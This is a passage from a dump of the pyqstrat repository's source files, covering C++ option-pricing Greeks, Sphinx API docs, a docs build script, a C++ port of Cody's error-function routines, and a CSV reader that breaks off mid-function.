0.01;\n}\n\ndouble rho(bool call, double S, double K, double t, double r, double sigma, double q) {\n //The text book analytical formula does not multiply by .01,\n //but in practice rho is defined as the change in price\n //for each 1 percent change in r, hence we multiply by 0.01.\n double D2 = d2(S, K, t, r, sigma, q);\n if (call)\n return t * K * exp(-r * t) * cdf(D2) * .01;\n else\n return -t * K * exp(-r * t) * cdf(-D2) * .01;\n}\n\ndouble implied_vol(bool call, double price, double S, double K, double t, double r, double q) {\n double dcf = exp(-1.0 * r * t);\n double undiscounted_price = price / dcf;\n double F = S * exp((r - q) * t); // Compute forward price\n double iv = implied_volatility_from_a_transformed_rational_guess(undiscounted_price, F, K, t, call ? 1.0 : -1.0);\n if (iv == std::numeric_limits<double>::max() || iv == -std::numeric_limits<double>::max()) return NAN;\n \n //cout << \"iv: \" << iv << \" undiscounted premium: \" << undiscounted_premium << \" forward_or_spot: \" << forward_or_spot <<\n //\" strike: \" << strike << \" t: \" << t << \" put_call_flag: \" << put_call_flag << endl;\n return iv;\n}\n\nint test_options() {\n double S = 9.3;\n double K = 10.0;\n double r = 0.01;\n double t = 1.0;\n double q = 0.01;\n double p = 1.0;\n bool call = false;\n double sigma = implied_vol(call, p, S, K, t, r, q);\n std::cout << std::fixed;\n std::cout << std::setprecision(10);\n \n cout << \"implied vol: \" << sigma << endl;\n sigma = 0.15;\n cout << \"price: \" << black_scholes_price(call, S, K, t, r, sigma, q) << endl;\n cout << \"delta: \" << delta(call, S, K, t, r, sigma, q) << endl;\n cout << \"gamma: \" << _gamma(S, K, t, r, sigma, q) << endl;\n cout << \"theta: \" << theta(call, S, K, t, r, sigma, q) << endl;\n cout << \"vega: \" << vega(S, K, t, r, sigma, q) << endl;\n cout << \"rho: \" << rho(call, S, K, t, r, sigma, q) << endl;\n return 0;\n}\n\n" }, { "alpha_fraction": 0.55069500207901, "alphanum_fraction": 0.55069500207901, "avg_line_length": 16.597122192382812, "blob_id": "3bc57987a063dfd8827a385d5821ad35dc2e621c", "content_id": "c2bcb57f6555ff0af70a7f10b91197001cff91e1", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2446, "license_type": "permissive", "max_line_length": 42, "num_lines": 139, "path": "/apidocs/source/pyqstrat.rst", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "pyqstrat package\n================\n\nSubmodules\n----------\n\n\npyqstrat.pq\\_utils module\n-------------------------\n\n.. automodule:: pyqstrat.pq_utils\n :members:\n :undoc-members:\n :show-inheritance:\n\npyqstrat.pq\\_types module\n-------------------------\n\n.. automodule:: pyqstrat.pq_types\n :members:\n :undoc-members:\n :show-inheritance:\n\n\npyqstrat.pq\\_io module\n----------------------\n\n.. automodule:: pyqstrat.pq_io\n :members:\n :undoc-members:\n :show-inheritance:\n\npyqstrat.holiday\\_calendars module\n----------------------------------\n\n.. automodule:: pyqstrat.holiday_calendars\n :members:\n :undoc-members:\n :show-inheritance:\n\npyqstrat.account module\n-----------------------\n\n.. automodule:: pyqstrat.account\n :members:\n :undoc-members:\n :show-inheritance:\n\npyqstrat.strategy module\n-------------------------\n\n.. automodule:: pyqstrat.strategy\n :members:\n :undoc-members:\n :show-inheritance:\n\npyqstrat.portfolio module\n-------------------------\n\n.. automodule:: pyqstrat.portfolio\n :members:\n :undoc-members:\n :show-inheritance:\n\n\npyqstrat.optimize module\n------------------------\n\n.. automodule:: pyqstrat.optimize\n :members:\n :undoc-members:\n :show-inheritance:\n\n\npyqstrat.plot module\n--------------------\n\n.. automodule:: pyqstrat.plot\n :members:\n :undoc-members:\n :show-inheritance:\n\n\npyqstrat.evaluator module\n-------------------------\n\n.. automodule:: pyqstrat.evaluator\n :members:\n :undoc-members:\n :show-inheritance:\n\n\npyqstrat.pyqstrat\\_cpp module\n-----------------------------\n\n.. automodule:: pyqstrat.pyqstrat_cpp\n :members:\n :undoc-members:\n :show-inheritance:\n :special-members: __call__, __init__\n\n\t\t \npyqstrat.pyqstrat\\_io module\n-----------------------------\n\n.. automodule:: pyqstrat.pyqstrat_io\n :members:\n :undoc-members:\n :show-inheritance:\n :special-members: __call__, __init__\n\n\npyqstrat.interactive\\_plot module\n---------------------------------\n\n.. automodule:: pyqstrat.interactive_plot\n :members:\n :undoc-members:\n :show-inheritance:\n :special-members: __call__, __init__\n\n\t\t \npyqstrat.markets module\n-------------------------------------\n\n.. automodule:: pyqstrat.markets\n :members:\n :undoc-members:\n :show-inheritance:\n :special-members: __call__, __init__\n\n\nModule contents\n---------------\n\n.. automodule:: pyqstrat\n :members:\n :undoc-members:\n :show-inheritance:\n" }, { "alpha_fraction": 0.5968992114067078, "alphanum_fraction": 0.5968992114067078, "avg_line_length": 17.428571701049805, "blob_id": "e82b1dd6ec462904e4292c7970615833382a6aa6", "content_id": "1271b59b77dd9802f7f4c8b0edb3504bccb02609", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 129, "license_type": "permissive", "max_line_length": 37, "num_lines": 7, "path": "/apidocs/build_docs.sh", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\n\nset -x\nrm -Rf ./build/\nsphinx-build -M html \"source\" \"build\"\nrm -Rf ../docs/*\ncp -R ./build/html/* ../docs/\n" }, { "alpha_fraction": 0.30927786231040955, "alphanum_fraction": 0.4102625846862793, "avg_line_length": 44.52967071533203, "blob_id": "04f2c2de814c6d8497eba2b23df902d6b1ff4248", "content_id": "196d3ad7d23728c50d2a948dc4fbd8bb7663f85f", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 20716, "license_type": "permissive", "max_line_length": 218, "num_lines": 455, "path": "/pyqstrat/cpp/lets_be_rational/erf_cody.cpp", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "//\n// Original Fortran code taken from http://www.netlib.org/specfun/erf, compiled with f2c, and adapted by hand.\n//\n// Created with command line f2c -C++ -c -a -krd -r8 cody_erf.f\n//\n// Translated by f2c (version 20100827).\n//\n\n//\n// This source code resides at www.jaeckel.org/LetsBeRational.7z .\n//\n// ======================================================================================\n// WARRANTY DISCLAIMER\n// The Software is provided \"as is\" without warranty of any kind, either express or implied,\n// including without limitation any implied warranties of condition, uninterrupted use,\n// merchantability, fitness for a particular purpose, or non-infringement.\n// ======================================================================================\n//\n\n#if defined( _DEBUG ) || defined( BOUNDS_CHECK_STL_ARRAYS )\n#define _SECURE_SCL 1\n#define _SECURE_SCL_THROWS 1\n#define _SCL_SECURE_NO_WARNINGS\n#define _HAS_ITERATOR_DEBUGGING 0\n#else\n#define _SECURE_SCL 0\n#endif\n#if defined(_MSC_VER)\n# define NOMINMAX // to suppress MSVC's definitions of min() and max()\n// These four pragmas are the equivalent to /fp:fast.\n# pragma float_control( except, off )\n# pragma float_control( precise, off )\n# pragma fp_contract( on )\n# pragma fenv_access( off )\n#endif\n\n#include \"normaldistribution.h\"\n#include <math.h>\n#include <float.h>\n\nnamespace {\n inline double d_int(const double x){ return( (x>0) ? floor(x) : -floor(-x) ); }\n}\n\n/*< SUBROUTINE CALERF(ARG,RESULT,JINT) >*/\ndouble calerf(double x, const int jint) {\n\n static const double a[5] = { 3.1611237438705656,113.864154151050156,377.485237685302021,3209.37758913846947,.185777706184603153 };\n static const double b[4] = { 23.6012909523441209,244.024637934444173,1282.61652607737228,2844.23683343917062 };\n static const double c__[9] = { .564188496988670089,8.88314979438837594,66.1191906371416295,298.635138197400131,881.95222124176909,1712.04761263407058,2051.07837782607147,1230.33935479799725,2.15311535474403846e-8 };\n static const double d__[8] = { 15.7449261107098347,117.693950891312499,537.181101862009858,1621.38957456669019,3290.79923573345963,4362.61909014324716,3439.36767414372164,1230.33935480374942 };\n static const double p[6] = { .305326634961232344,.360344899949804439,.125781726111229246,.0160837851487422766,6.58749161529837803e-4,.0163153871373020978 };\n static const double q[5] = { 2.56852019228982242,1.87295284992346047,.527905102951428412,.0605183413124413191,.00233520497626869185 };\n\n static const double zero = 0.;\n static const double half = .5;\n static const double one = 1.;\n static const double two = 2.;\n static const double four = 4.;\n static const double sqrpi = 0.56418958354775628695;\n static const double thresh = .46875;\n static const double sixten = 16.;\n\n double y, del, ysq, xden, xnum, result;\n\n /* ------------------------------------------------------------------ */\n /* This packet evaluates erf(x), erfc(x), and exp(x*x)*erfc(x) */\n /* for a real argument x. It contains three FUNCTION type */\n /* subprograms: ERF, ERFC, and ERFCX (or DERF, DERFC, and DERFCX), */\n /* and one SUBROUTINE type subprogram, CALERF. The calling */\n /* statements for the primary entries are: */\n /* Y=ERF(X) (or Y=DERF(X)), */\n /* Y=ERFC(X) (or Y=DERFC(X)), */\n /* and */\n /* Y=ERFCX(X) (or Y=DERFCX(X)). */\n /* The routine CALERF is intended for internal packet use only, */\n /* all computations within the packet being concentrated in this */\n /* routine. The function subprograms invoke CALERF with the */\n /* statement */\n /* CALL CALERF(ARG,RESULT,JINT) */\n /* where the parameter usage is as follows */\n /* Function Parameters for CALERF */\n /* call ARG Result JINT */\n /* ERF(ARG) ANY REAL ARGUMENT ERF(ARG) 0 */\n /* ERFC(ARG) ABS(ARG) .LT. XBIG ERFC(ARG) 1 */\n /* ERFCX(ARG) XNEG .LT. ARG .LT. XMAX ERFCX(ARG) 2 */\n /* The main computation evaluates near-minimax approximations */\n /* from \"Rational Chebyshev approximations for the error function\" */\n /* by W. J. Cody, Math. Comp., 1969, PP. 631-638. This */\n /* transportable program uses rational functions that theoretically */\n /* approximate erf(x) and erfc(x) to at least 18 significant */\n /* decimal digits. The accuracy achieved depends on the arithmetic */\n /* system, the compiler, the intrinsic functions, and proper */\n /* selection of the machine-dependent constants. */\n /* ******************************************************************* */\n /* ******************************************************************* */\n /* Explanation of machine-dependent constants */\n /* XMIN = the smallest positive floating-point number. */\n /* XINF = the largest positive finite floating-point number. */\n /* XNEG = the largest negative argument acceptable to ERFCX; */\n /* the negative of the solution to the equation */\n /* 2*exp(x*x) = XINF. */\n /* XSMALL = argument below which erf(x) may be represented by */\n /* 2*x/sqrt(pi) and above which x*x will not underflow. */\n /* A conservative value is the largest machine number X */\n /* such that 1.0 + X = 1.0 to machine precision. */\n /* XBIG = largest argument acceptable to ERFC; solution to */\n /* the equation: W(x) * (1-0.5/x**2) = XMIN, where */\n /* W(x) = exp(-x*x)/[x*sqrt(pi)]. */\n /* XHUGE = argument above which 1.0 - 1/(2*x*x) = 1.0 to */\n /* machine precision. A conservative value is */\n /* 1/[2*sqrt(XSMALL)] */\n /* XMAX = largest acceptable argument to ERFCX; the minimum */\n /* of XINF and 1/[sqrt(pi)*XMIN]. */\n // The numbers below were preselected for IEEE .\n static const double xinf = 1.79e308;\n static const double xneg = -26.628;\n static const double xsmall = 1.11e-16;\n static const double xbig = 26.543;\n static const double xhuge = 6.71e7;\n static const double xmax = 2.53e307;\n /* Approximate values for some important machines are: */\n /* XMIN XINF XNEG XSMALL */\n /* CDC 7600 (S.P.) 3.13E-294 1.26E+322 -27.220 7.11E-15 */\n /* CRAY-1 (S.P.) 4.58E-2467 5.45E+2465 -75.345 7.11E-15 */\n /* IEEE (IBM/XT, */\n /* SUN, etc.) (S.P.) 1.18E-38 3.40E+38 -9.382 5.96E-8 */\n /* IEEE (IBM/XT, */\n /* SUN, etc.) (D.P.) 2.23D-308 1.79D+308 -26.628 1.11D-16 */\n /* IBM 195 (D.P.) 5.40D-79 7.23E+75 -13.190 1.39D-17 */\n /* UNIVAC 1108 (D.P.) 2.78D-309 8.98D+307 -26.615 1.73D-18 */\n /* VAX D-Format (D.P.) 2.94D-39 1.70D+38 -9.345 1.39D-17 */\n /* VAX G-Format (D.P.) 5.56D-309 8.98D+307 -26.615 1.11D-16 */\n /* XBIG XHUGE XMAX */\n /* CDC 7600 (S.P.) 25.922 8.39E+6 1.80X+293 */\n /* CRAY-1 (S.P.) 75.326 8.39E+6 5.45E+2465 */\n /* IEEE (IBM/XT, */\n /* SUN, etc.) (S.P.) 9.194 2.90E+3 4.79E+37 */\n /* IEEE (IBM/XT, */\n /* SUN, etc.) (D.P.) 26.543 6.71D+7 2.53D+307 */\n /* IBM 195 (D.P.) 13.306 1.90D+8 7.23E+75 */\n /* UNIVAC 1108 (D.P.) 26.582 5.37D+8 8.98D+307 */\n /* VAX D-Format (D.P.) 9.269 1.90D+8 1.70D+38 */\n /* VAX G-Format (D.P.) 26.569 6.71D+7 8.98D+307 */\n /* ******************************************************************* */\n /* ******************************************************************* */\n /* Error returns */\n /* The program returns ERFC = 0 for ARG .GE. XBIG; */\n /* ERFCX = XINF for ARG .LT. XNEG; */\n /* and */\n /* ERFCX = 0 for ARG .GE. XMAX. */\n /* Intrinsic functions required are: */\n /* ABS, AINT, EXP */\n /* Author: W. J. Cody */\n /* Mathematics and Computer Science Division */\n /* Argonne National Laboratory */\n /* Argonne, IL 60439 */\n /* Latest modification: March 19, 1990 */\n /* ------------------------------------------------------------------ */\n /*< INTEGER I,JINT >*/\n /* S REAL */\n /*< >*/\n /*< DIMENSION A(5),B(4),C(9),D(8),P(6),Q(5) >*/\n /* ------------------------------------------------------------------ */\n /* Mathematical constants */\n /* ------------------------------------------------------------------ */\n /* S DATA FOUR,ONE,HALF,TWO,ZERO/4.0E0,1.0E0,0.5E0,2.0E0,0.0E0/, */\n /* S 1 SQRPI/5.6418958354775628695E-1/,THRESH/0.46875E0/, */\n /* S 2 SIXTEN/16.0E0/ */\n /*< >*/\n /* ------------------------------------------------------------------ */\n /* Machine-dependent constants */\n /* ------------------------------------------------------------------ */\n /* S DATA XINF,XNEG,XSMALL/3.40E+38,-9.382E0,5.96E-8/, */\n /* S 1 XBIG,XHUGE,XMAX/9.194E0,2.90E3,4.79E37/ */\n /*< >*/\n /* ------------------------------------------------------------------ */\n /* Coefficients for approximation to erf in first interval */\n /* ------------------------------------------------------------------ */\n /* S DATA A/3.16112374387056560E00,1.13864154151050156E02, */\n /* S 1 3.77485237685302021E02,3.20937758913846947E03, */\n /* S 2 1.85777706184603153E-1/ */\n /* S DATA B/2.36012909523441209E01,2.44024637934444173E02, */\n /* S 1 1.28261652607737228E03,2.84423683343917062E03/ */\n /*< >*/\n /*< >*/\n /* ------------------------------------------------------------------ */\n /* Coefficients for approximation to erfc in second interval */\n /* ------------------------------------------------------------------ */\n /* S DATA C/5.64188496988670089E-1,8.88314979438837594E0, */\n /* S 1 6.61191906371416295E01,2.98635138197400131E02, */\n /* S 2 8.81952221241769090E02,1.71204761263407058E03, */\n /* S 3 2.05107837782607147E03,1.23033935479799725E03, */\n /* S 4 2.15311535474403846E-8/ */\n /* S DATA D/1.57449261107098347E01,1.17693950891312499E02, */\n /* S 1 5.37181101862009858E02,1.62138957456669019E03, */\n /* S 2 3.29079923573345963E03,4.36261909014324716E03, */\n /* S 3 3.43936767414372164E03,1.23033935480374942E03/ */\n /*< >*/\n /*< >*/\n /* ------------------------------------------------------------------ */\n /* Coefficients for approximation to erfc in third interval */\n /* ------------------------------------------------------------------ */\n /* S DATA P/3.05326634961232344E-1,3.60344899949804439E-1, */\n /* S 1 1.25781726111229246E-1,1.60837851487422766E-2, */\n /* S 2 6.58749161529837803E-4,1.63153871373020978E-2/ */\n /* S DATA Q/2.56852019228982242E00,1.87295284992346047E00, */\n /* S 1 5.27905102951428412E-1,6.05183413124413191E-2, */\n /* S 2 2.33520497626869185E-3/ */\n /*< >*/\n /*< >*/\n /* ------------------------------------------------------------------ */\n /*< X = ARG >*/\n // x = *arg;\n /*< Y = ABS(X) >*/\n y = fabs(x);\n /*< IF (Y .LE. THRESH) THEN >*/\n if (y <= thresh) {\n /* ------------------------------------------------------------------ */\n /* Evaluate erf for |X| <= 0.46875 */\n /* ------------------------------------------------------------------ */\n /*< YSQ = ZERO >*/\n ysq = zero;\n /*< IF (Y .GT. XSMALL) YSQ = Y * Y >*/\n if (y > xsmall) {\n ysq = y * y;\n }\n /*< XNUM = A(5)*YSQ >*/\n xnum = a[4] * ysq;\n /*< XDEN = YSQ >*/\n xden = ysq;\n /*< DO 20 I = 1, 3 >*/\n for (int i__ = 1; i__ <= 3; ++i__) {\n /*< XNUM = (XNUM + A(I)) * YSQ >*/\n xnum = (xnum + a[i__ - 1]) * ysq;\n /*< XDEN = (XDEN + B(I)) * YSQ >*/\n xden = (xden + b[i__ - 1]) * ysq;\n /*< 20 CONTINUE >*/\n /* L20: */\n }\n /*< RESULT = X * (XNUM + A(4)) / (XDEN + B(4)) >*/\n result = x * (xnum + a[3]) / (xden + b[3]);\n /*< IF (JINT .NE. 0) RESULT = ONE - RESULT >*/\n if (jint != 0) {\n result = one - result;\n }\n /*< IF (JINT .EQ. 2) RESULT = EXP(YSQ) * RESULT >*/\n if (jint == 2) {\n result = exp(ysq) * result;\n }\n /*< GO TO 800 >*/\n goto L800;\n /* ------------------------------------------------------------------ */\n /* Evaluate erfc for 0.46875 <= |X| <= 4.0 */\n /* ------------------------------------------------------------------ */\n /*< ELSE IF (Y .LE. FOUR) THEN >*/\n } else if (y <= four) {\n /*< XNUM = C(9)*Y >*/\n xnum = c__[8] * y;\n /*< XDEN = Y >*/\n xden = y;\n /*< DO 120 I = 1, 7 >*/\n for (int i__ = 1; i__ <= 7; ++i__) {\n /*< XNUM = (XNUM + C(I)) * Y >*/\n xnum = (xnum + c__[i__ - 1]) * y;\n /*< XDEN = (XDEN + D(I)) * Y >*/\n xden = (xden + d__[i__ - 1]) * y;\n /*< 120 CONTINUE >*/\n /* L120: */\n }\n /*< RESULT = (XNUM + C(8)) / (XDEN + D(8)) >*/\n result = (xnum + c__[7]) / (xden + d__[7]);\n /*< IF (JINT .NE. 2) THEN >*/\n if (jint != 2) {\n /*< YSQ = AINT(Y*SIXTEN)/SIXTEN >*/\n double d__1 = y * sixten;\n ysq = d_int(d__1) / sixten;\n /*< DEL = (Y-YSQ)*(Y+YSQ) >*/\n del = (y - ysq) * (y + ysq);\n /*< RESULT = EXP(-YSQ*YSQ) * EXP(-DEL) * RESULT >*/\n d__1 = exp(-ysq * ysq) * exp(-del);\n result = d__1 * result;\n /*< END IF >*/\n }\n /* ------------------------------------------------------------------ */\n /* Evaluate erfc for |X| > 4.0 */\n /* ------------------------------------------------------------------ */\n /*< ELSE >*/\n } else {\n /*< RESULT = ZERO >*/\n result = zero;\n /*< IF (Y .GE. XBIG) THEN >*/\n if (y >= xbig) {\n /*< IF ((JINT .NE. 2) .OR. (Y .GE. XMAX)) GO TO 300 >*/\n if (jint != 2 || y >= xmax) {\n goto L300;\n }\n /*< IF (Y .GE. XHUGE) THEN >*/\n if (y >= xhuge) {\n /*< RESULT = SQRPI / Y >*/\n result = sqrpi / y;\n /*< GO TO 300 >*/\n goto L300;\n /*< END IF >*/\n }\n /*< END IF >*/\n }\n /*< YSQ = ONE / (Y * Y) >*/\n ysq = one / (y * y);\n /*< XNUM = P(6)*YSQ >*/\n xnum = p[5] * ysq;\n /*< XDEN = YSQ >*/\n xden = ysq;\n /*< DO 240 I = 1, 4 >*/\n for (int i__ = 1; i__ <= 4; ++i__) {\n /*< XNUM = (XNUM + P(I)) * YSQ >*/\n xnum = (xnum + p[i__ - 1]) * ysq;\n /*< XDEN = (XDEN + Q(I)) * YSQ >*/\n xden = (xden + q[i__ - 1]) * ysq;\n /*< 240 CONTINUE >*/\n /* L240: */\n }\n /*< RESULT = YSQ *(XNUM + P(5)) / (XDEN + Q(5)) >*/\n result = ysq * (xnum + p[4]) / (xden + q[4]);\n /*< RESULT = (SQRPI - RESULT) / Y >*/\n result = (sqrpi - result) / y;\n /**< IF (JINT .NE. 2) THEN >*/\n if (jint != 2) {\n /*< YSQ = AINT(Y*SIXTEN)/SIXTEN >*/\n double d__1 = y * sixten;\n ysq = d_int(d__1) / sixten;\n /*< DEL = (Y-YSQ)*(Y+YSQ) >*/\n del = (y - ysq) * (y + ysq);\n /*< RESULT = EXP(-YSQ*YSQ) * EXP(-DEL) * RESULT >*/\n d__1 = exp(-ysq * ysq) * exp(-del);\n result = d__1 * result;\n /*< END IF >*/\n }\n /*< END IF >*/\n }\n /* ------------------------------------------------------------------ */\n /* Fix up for negative argument, erf, etc. */\n /* ------------------------------------------------------------------ */\n /*< 300 IF (JINT .EQ. 0) THEN >*/\nL300:\n if (jint == 0) {\n /*< RESULT = (HALF - RESULT) + HALF >*/\n result = (half - result) + half;\n /*< IF (X .LT. ZERO) RESULT = -RESULT >*/\n if (x < zero) {\n result = -(result);\n }\n /*< ELSE IF (JINT .EQ. 1) THEN >*/\n } else if (jint == 1) {\n /*< IF (X .LT. ZERO) RESULT = TWO - RESULT >*/\n if (x < zero) {\n result = two - result;\n }\n /*< ELSE >*/\n } else {\n /*< IF (X .LT. ZERO) THEN >*/\n if (x < zero) {\n /*< IF (X .LT. XNEG) THEN >*/\n if (x < xneg) {\n /*< RESULT = XINF >*/\n result = xinf;\n /*< ELSE >*/\n } else {\n /*< YSQ = AINT(X*SIXTEN)/SIXTEN >*/\n double d__1 = x * sixten;\n ysq = d_int(d__1) / sixten;\n /*< DEL = (X-YSQ)*(X+YSQ) >*/\n del = (x - ysq) * (x + ysq);\n /*< Y = EXP(YSQ*YSQ) * EXP(DEL) >*/\n y = exp(ysq * ysq) * exp(del);\n /*< RESULT = (Y+Y) - RESULT >*/\n result = y + y - result;\n /*< END IF >*/\n }\n /*< END IF >*/\n }\n /*< END IF >*/\n }\n /*< 800 RETURN >*/\nL800:\n return result;\n /* ---------- Last card of CALERF ---------- */\n /*< END >*/\n} /* calerf_ */\n\n/* S REAL FUNCTION ERF(X) */\n/*< DOUBLE PRECISION FUNCTION DERF(X) >*/\ndouble erf_cody(double x){\n /* -------------------------------------------------------------------- */\n /* This subprogram computes approximate values for erf(x). */\n /* (see comments heading CALERF). */\n /* Author/date: W. J. Cody, January 8, 1985 */\n /* -------------------------------------------------------------------- */\n /*< INTEGER JINT >*/\n /* S REAL X, RESULT */\n /*< DOUBLE PRECISION X, RESULT >*/\n /* ------------------------------------------------------------------ */\n /*< JINT = 0 >*/\n /*< CALL CALERF(X,RESULT,JINT) >*/\n return calerf(x, 0);\n /* S ERF = RESULT */\n /*< DERF = RESULT >*/\n /*< RETURN >*/\n /* ---------- Last card of DERF ---------- */\n /*< END >*/\n} /* derf_ */\n\n/* S REAL FUNCTION ERFC(X) */\n/*< DOUBLE PRECISION FUNCTION DERFC(X) >*/\ndouble erfc_cody(double x) {\n /* -------------------------------------------------------------------- */\n /* This subprogram computes approximate values for erfc(x). */\n /* (see comments heading CALERF). */\n /* Author/date: W. J. Cody, January 8, 1985 */\n /* -------------------------------------------------------------------- */\n /*< INTEGER JINT >*/\n /* S REAL X, RESULT */\n /*< DOUBLE PRECISION X, RESULT >*/\n /* ------------------------------------------------------------------ */\n /*< JINT = 1 >*/\n /*< CALL CALERF(X,RESULT,JINT) >*/\n return calerf(x, 1);\n /* S ERFC = RESULT */\n /*< DERFC = RESULT >*/\n /*< RETURN >*/\n /* ---------- Last card of DERFC ---------- */\n /*< END >*/\n} /* derfc_ */\n\n/* S REAL FUNCTION ERFCX(X) */\n/*< DOUBLE PRECISION FUNCTION DERFCX(X) >*/\ndouble erfcx_cody(double x) {\n /* ------------------------------------------------------------------ */\n /* This subprogram computes approximate values for exp(x*x) * erfc(x). */\n /* (see comments heading CALERF). */\n /* Author/date: W. J. Cody, March 30, 1987 */\n /* ------------------------------------------------------------------ */\n /*< INTEGER JINT >*/\n /* S REAL X, RESULT */\n /*< DOUBLE PRECISION X, RESULT >*/\n /* ------------------------------------------------------------------ */\n /*< JINT = 2 >*/\n /*< CALL CALERF(X,RESULT,JINT) >*/\n return calerf(x, 2);\n /* S ERFCX = RESULT */\n /*< DERFCX = RESULT >*/\n /*< RETURN >*/\n /* ---------- Last card of DERFCX ---------- */\n /*< END >*/\n} /* derfcx_ */\n" }, { "alpha_fraction": 0.4844896197319031, "alphanum_fraction": 0.5023055672645569, "avg_line_length": 30.13050651550293, "blob_id": "e31274cdcbc6481df3edcb23f9788463c8c70f0f", "content_id": "fd0ea34422309e65ee0e05e5899451ff27ce5f98", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 19084, "license_type": "permissive", "max_line_length": 117, "num_lines": 613, "path": "/pyqstrat/cpp/io/csv_reader.cpp", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "//\n// csv_reader.cpp\n// py_c_test\n//\n// Created by Sal Abbasi on 9/12/22.\n//\n\n#include \"csv_reader.hpp\"\n#include <cmath>\n#include <algorithm>\n#include <fstream>\n#include <iostream>\n#include <vector>\n#include <queue>\n#include <mutex>\n#include <zip.h>\n#include <math.h>\n#include <string.h>\n#include <unordered_map>\n#include \"utils.hpp\"\n\n\n// Windows uses _strdup instead of non-standard strdup function\n#ifdef _MSC_VER\n #define strdup _strdup\n #define _CRT_SECURE_NO_WARNINGS\n #include <BaseTsd.h>\n typedef SSIZE_T ssize_t;\n#endif\n\nusing namespace std;\n\nstatic const float NANF = nanf(\"\");\nstatic const double NAND = nan(\"\");\n\nstring get_error(int err_num) {\n char errmsg[255];\n#ifdef _MSC_VER\n ::strerror_s(errmsg, 255, err_num);\n#else\n ::strerror_r(err_num, errmsg, 255);\n#endif\n return string(errmsg);\n}\n\nvector<char*> tokenize_line(char *s, char delim, const vector<int>& col_indices) {\n vector<char*> ret;\n ret.reserve(16);\n size_t col_idx = 0;\n char* begin = s;\n size_t curr_col_idx = 0;\n size_t size = ::strlen(s);\n s[size] = delim; // replace last \\0 with delim so we can tokenize last column\n for (size_t i = 0; i < size + 1; ++i) {\n if (s[i] == delim) {\n s[i] = '\\0';\n if (col_indices[col_idx] == static_cast<int>(curr_col_idx)) {\n ret.push_back(begin);\n col_idx += 1;\n if (col_idx == col_indices.size()) break;\n }\n begin = s + i + 1;\n curr_col_idx += 1;\n }\n }\n return ret;\n}\n\nfloat str_to_float(const char* str, char decimal_point, char thousands_separator) {\n // convert a string to a float\n float result = 0;\n bool zero = false;\n float sign = *str == '-' ? static_cast<void>(str++), -1.0f : 1.0f;\n if (*str == '0') zero = true;\n while ((*str >= '0' && *str <= '9') || (*str == thousands_separator)) {\n if (*str == thousands_separator) {\n str++;\n continue;\n }\n result *= 10;\n result += *str - '0';\n str++;\n }\n if (!zero && (result == 0)) return NANF;\n\n float multiplier = 0.1f;\n if (*str == decimal_point) {\n str++;\n while (*str >= '0' && *str <= '9') {\n result += (*str - '0') * multiplier;\n multiplier /= 10;\n str++;\n }\n }\n \n float power = 0.0f;\n result *= sign;\n if (*str == 'e' || *str == 'E') {\n str++;\n float powerer = *str == '-'? static_cast<void>(str++), 0.1f : 10.0f;\n \n while ((*str >= '0') && (*str <= '9')) {\n power *= 10;\n power += *str - '0';\n str++;\n }\n result *= pow(powerer, power);\n }\n return result;\n}\n\n\ndouble str_to_double(const char* str, char decimal_point, char thousands_separator) {\n // convert a string to a float\n double result = 0;\n bool zero = false;\n float sign = *str == '-' ? static_cast<void>(str++), -1.0f : 1.0f;\n if (*str == '0') zero = true;\n while ((*str >= '0' && *str <= '9') || (*str == thousands_separator)) {\n if (*str == thousands_separator) {\n str++;\n continue;\n }\n result *= 10;\n result += *str - '0';\n str++;\n }\n if (!zero && (result == 0)) return NAND;\n \n float multiplier = 0.1f;\n if (*str == decimal_point) {\n str++;\n while (*str >= '0' && *str <= '9') {\n result += (*str - '0') * multiplier;\n multiplier /= 10;\n str++;\n }\n }\n \n float power = 0.0f;\n result *= sign;\n if (*str == 'e' || *str == 'E') {\n str++;\n float powerer = *str == '-'? static_cast<void>(str++), 0.1f : 10.0f;\n \n while ((*str >= '0') && (*str <= '9')) {\n power *= 10;\n power += *str - '0';\n str++;\n }\n result *= pow(powerer, power);\n }\n return result;\n}\n\nint32_t str_to_int32(const char* str, char thousands_separator) {\n // convert a string to a int\n int result = 0;\n int sign = *str == '-' ? static_cast<void>(str++), -1 : 1;\n while ((*str >= '0' && *str <= '9') || (*str == thousands_separator)) {\n if (*str == thousands_separator) {\n str++;\n continue;\n }\n result *= 10;\n result += *str - '0';\n str++;\n }\n result *= sign;\n return result;\n}\n\nint64_t str_to_int64(const char* str, char thousands_separator) {\n // convert a string to a int\n int64_t result = 0;\n int sign = *str == '-' ? static_cast<void>(str++), -1 : 1;\n while ((*str >= '0' && *str <= '9') || (*str == thousands_separator)) {\n if (*str == thousands_separator) {\n str++;\n continue;\n }\n result *= 10;\n result += *str - '0';\n str++;\n }\n result *= sign;\n return result;\n}\n\nint8_t str_to_int8(const char* str) {\n // convert a string to a int\n auto len = strlen(str);\n if (len == 0) return 0;\n if (len == 4) {\n if (strcmp(str, \"true\") == 0) return 1;\n if (strcmp(str, \"TRUE\") == 0) return 1;\n if (strcmp(str, \"True\") == 0) return 1;\n }\n if (len == 5) {\n if (strcmp(str, \"false\") == 0) return 0;\n if (strcmp(str, \"FALSE\") == 0) return 0;\n if (strcmp(str, \"False\") == 0) return 0;\n }\n int8_t result = 0;\n int sign = *str == '-' ? static_cast<void>(str++), -1 : 1;\n while (*str >= '0' && *str <= '9') {\n result *= 10;\n result += *str - '0';\n str++;\n }\n result *= sign;\n return result;\n}\n\ntemplate<typename T> T parse_string(const char* str) {\n return std::string(str);\n}\n\ntemplate<> int32_t parse_string<int32_t>(const char* str) {\n return str_to_int32(str, ',');\n}\n\ntemplate<> int64_t parse_string<int64_t>(const char* str) {\n return str_to_int64(str, ',');\n}\n\ntemplate<> float parse_string<float>(const char* str) {\n return str_to_float(str, '.', ',');\n}\n\ntemplate<> double parse_string<double>(const char* str) {\n return 